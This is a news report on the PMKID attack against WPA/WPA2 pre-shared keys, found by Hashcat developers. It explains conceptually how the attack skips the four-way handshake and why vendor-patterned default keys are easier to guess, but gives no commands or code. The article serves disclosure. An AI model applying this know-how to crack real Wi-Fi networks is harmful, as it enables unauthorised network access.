A new attack on Wi-Fi protected access protocols has been discovered. The new technique to crack WPA PSK (Pre-Shared Key) passwords enables outside users to capture access credentials easily.
The discovery of the attack was accidental – the Hashcat developers came across the new attack while testing the security of the upcoming WPA3 authentication method for wireless networks.
The new technique captures the Pairwise Master Key Identifier (PMKID) and as explained by the developers that devised it, it works against 802.11i/p/q/r networks with roaming functions enabled. This means that most modern routers are potentially at risk.
What is the difference between the new attack and previous WPA/WPA2 cracks?
According to Hashcat developer Jen “Atom” Steube, the most significant difference between older attacks and the newly discovered method is that an attacker no longer needs another user to be on the targeted network to capture credentials. The only thing needed is the initiation of the authentication process.
The researcher also added that earlier WPA/WPA2 attacks were more challenging to carry out, because “in the past the attacker had to record the WPA four-way handshake to launch an offline attack”. This may sound easy but in fact this type of attack can create a lot of trouble from a technical perspective.
The new attack is much easier to pull off, because “if you receive the PMKID from the access point, you will be able to get into the network if you can guess the [WPA] pre-shared key (PSK)“.
Depending on the length and complexity of the pre-shared key, the success of the attack may vary. It should be noted that most users don’t have the technical capacity to change the PSK on their routers and generally use the manufacturer generated key. This becomes a premise for attackers to guess the key. The cracking of such a password becomes even easier with manufacturers creating PSKs following a pattern that can be traced back to the make of the routers.
In a nutshell, here’s why this attack is much better than previous techniques:
– No more regular users required – because the attacker directly communicates with the AP (aka “client-less” attack)
– No more waiting for a complete 4-way handshake between the regular user and the AP
– No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
– No more eventual invalid passwords sent by the regular user
– No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
– No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
– No more special output format (pcap, hccapx, etc.) – final data will appear as regular hex encoded string
Who is affected?
At this time, the researchers are not sure for which vendors or for how many routers this technique will work, but they definitely think it will work against all 802.11i/p/q/r networks with roaming functions enabled. Shortly put, this means most modern routers.